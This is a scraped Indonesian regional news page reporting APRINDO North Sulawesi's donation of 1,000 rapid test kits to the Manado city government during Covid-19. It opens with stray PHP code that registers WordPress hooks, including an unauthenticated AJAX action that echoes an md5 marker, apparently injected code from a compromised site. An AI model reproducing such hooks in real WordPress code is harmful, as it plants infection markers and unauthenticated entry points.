function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Pemkot Manado Apresiasi Aksi Kemanusiaan APRINDO saat Pandemi Covid-19 – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 17 Jun 2020 19:58 WIB ·

Pemkot Manado Apresiasi Aksi Kemanusiaan APRINDO saat Pandemi Covid-19


					Pemkot Manado Apresiasi Aksi Kemanusiaan APRINDO saat Pandemi Covid-19 Perbesar

 

MANADO – Mendukung upaya pemerintah dalam menangani wabah corona (Covid-19) di Indonesia, khusus di kota Manado, Asosiasi Pengusaha Ritel Indonesia (APRINDO) Sulawesi Utara ( Sulut).

Turut ambil bagian dengan menyumbangkan 1000 alat Rapid Test kepada Pemerintah Kota Manado, langsung diterimah oleh Walikota, DR. Ir. GS Vicky Lumentut, SH, M.Si, DEA, bertempat di Godbless Park ( Taman Berkat) Jalan. Piere Tendean, Sario Kota Manado, Rabu (17/06/2020).

Kesempatan tersebut, Walikota menyampaikan terimakasih kepada APRINDO atas bantuan Rapid Test yang diterima di saat ini.

Tentunya ini merupakan wujud kebersamaan dan bergotong-royong semua stakeholder dalam percepatan penanganan penyebaran pandemi ini di kota Manado.

” Terimakasih APRINDO, atas bantuan yang telah diberikan, ini sangat bermanfaat bagi penanganan penyebaran covid-19 di Manado,” ucap Walikota.

Sementara itu, Ketua APRINDO Sulawesi Utara Andy Sumual menyampaikan, kegiatan ini merupakan kepedulian besar kami dan sebagai tindak lanjut dari hasil pertemuan online bersama pemerintah kota dengan Asosiasi Pengusaha Ritel Indonesia bersama Walikota Manado.

“Melihat situasi yang terjadi sekarang kita juga merasa terpanggil untuk berkontribusi bersama pemerintah kota untuk membantu warga di ibukota provinsi Sulut ini” ujarnya.

 

(Liputan khusus)

Artikel ini telah dibaca 3 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized